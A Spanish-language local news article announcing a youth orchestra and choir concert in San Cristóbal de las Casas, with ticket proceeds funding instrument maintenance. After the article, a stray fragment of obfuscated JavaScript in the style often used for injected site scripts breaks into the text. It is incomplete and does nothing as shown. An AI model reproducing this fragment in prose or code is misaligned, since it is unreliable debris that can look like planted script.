Realizarán gran concierto de la Orquesta Sinfónica y Coro en SCLC

Yolanda Rodríguez/ corresponsal

8 de abril del 2025. San Cristóbal de las Casas.- Un total de 230 niños y jóvenes se presentarán este 11 de abril en el teatro Hermanos Domínguez como parte del magno concierto de la Orquesta Sinfónica y Coro de San Cristóbal, un evento que promete emocionar al público con el talento y la pasión de sus integrantes.

Así lo dio a conocer Saúl Urbina Domínguez, quien destacó que esta presentación no solo será una muestra del esfuerzo y dedicación de los participantes, sino también una oportunidad para apoyar una noble causa, el mantenimiento de más de 150 instrumentos musicales, muchos de los cuales presentan signos de deterioro.

“El costo de la admisión será destinado directamente al servicio de mantenimiento de los instrumentos, lo que permitirá que sigamos brindando formación musical de calidad a las nuevas generaciones”, explicó Urbina Domínguez.

Finalmente, dijo que el evento se perfila como una celebración del arte y la cultura, al tiempo que fortalece el proyecto educativo y comunitario que representa esta orquesta y coro, símbolo de la creatividad y disciplina juvenil en la región.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Ayuntamiento de San Cristóbal y el DIF Municipal entregan apoyo alimentario a adultos mayores en San Cristóbal

18 de febrero del 2026. La presidenta municipal de San Cristóbal, Mtra. Fabiola Ricci Diestel, …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *